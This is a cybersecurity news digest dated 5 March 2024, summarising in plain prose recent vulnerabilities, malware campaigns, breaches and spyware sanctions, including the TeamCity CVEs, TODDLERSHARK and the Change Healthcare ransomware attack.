05-Mar-24: In Security News Today

Critical Software Supply Chain Bugs in TeamCity

JetBrains has released patches for two critical vulnerabilities (CVE-2024-27198 and CVE-2024-27199) in its TeamCity software, allowing attackers to gain administrative control over on-premises servers. Rapid7 reported the flaws, with high CVSS scores, prompting JetBrains to advise immediate patching to prevent unauthenticated access. Users can update to version 2023.11.4 or apply a targeted security patch plugin to mitigate the risks posed by these vulnerabilities.

Exploitation of ConnectWise ScreenConnect Flaws by TODDLERSHARK Malware

North Korean threat actors have exploited security flaws in ConnectWise ScreenConnect to deploy TODDLERSHARK malware, which shares similarities with known Kimsuky malware like BabyShark and ReconShark. The attackers gained access through the exposed setup wizard of ScreenConnect, executing VB-based malware via cmd.exe. The malware, exhibiting polymorphic behavior, captures sensitive information and acts as a reconnaissance tool, while the threat actors targeted servers of semiconductor manufacturers using living-off-the-land techniques to evade detection.

U.S. Health Department Intervenes in Change Healthcare Hack Crisis

Following a ransomware attack on Change Healthcare, which disrupted medical payments, the U.S. Health and Human Services Department announced measures to alleviate the impact, including relaxing Medicare prescription requirements and considering advance payments for affected healthcare facilities. The attack led to significant financial strain on healthcare providers, prompting governmental and trade body appeals for urgent support. Amidst this crisis, UnitedHealth Group’s Optum has offered loans to impacted providers, highlighting the critical need for enhanced cybersecurity resilience in the healthcare sector.

VMware Patches Critical ESXi Sandbox Escape Flaws

VMware has issued urgent patches for critical flaws in its ESXi, Workstation, Fusion, and Cloud Foundation products, targeting vulnerabilities that could allow a local admin to execute code as the host’s VMX process. Two of these vulnerabilities have a CVSS severity score of 9.3, posing significant risks that prompted VMware to release fixes for even end-of-life products. The flaws include use-after-free vulnerabilities and an out-of-bounds write issue, highlighting the need for immediate updates by users.

US Sanctions Against Predator Spyware Developers

The US Treasury Department has sanctioned individuals and companies linked to the Intellexa Consortium for developing and distributing Predator Spyware, which targeted US officials, journalists, and experts. The sanctions mark the first US action against the misuse of spyware, emphasizing the risks such tools pose to security and human rights. Predator Spyware enables unauthorized data extraction and surveillance through zero-click attacks, highlighting the need for stringent controls on commercial surveillance technologies.

American Express Customer Data Exposed in Third-Party Breach

American Express notified customers of a data breach involving a third-party service provider used by its travel services division, compromising credit card information. The breach did not affect American Express’ own systems. Users are advised to monitor their accounts for fraudulent activity and enable notifications on the American Express Mobile app for updates.

Compromised ChatGPT Credentials for Sale on Dark Web

Over 225,000 compromised OpenAI ChatGPT credentials were found for sale on the dark web between January and October 2023, linked to malware like LummaC2, Raccoon, and RedLine. The increase in compromised credentials is attributed to a surge in infected devices, with nation-state actors from Russia, North Korea, Iran, and China leveraging AI and large language models for cyber attacks. Threat actors are now targeting devices with access to public AI systems to obtain confidential information and authentication data, posing significant challenges for identity and access management.

Cyber Attack: Ukrainian Hackers Breach Russian Ministry of Defense

Hackers from Ukraine’s Main Intelligence Directorate claimed a successful breach of the Russian Ministry of Defense servers, obtaining sensitive documents and identifying high-ranking officials. The attack included exfiltration of encryption software details and secret service documents. These cyber attacks, if verified, would mark significant victories for Ukraine amidst ongoing conflict with Russia.

Warning: Thread Hijacking Attack Targets IT Networks

A threat actor known as TA577 is using ZIP archive attachments in phishing emails to steal NTLM hashes, enabling sensitive information gathering and follow-on activities. This attack method involves thread hijacking, where phishing emails appear as responses to previous emails to increase success rates. Organizations are advised to block outbound SMB to prevent exploitation by this sophisticated cybercrime group.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.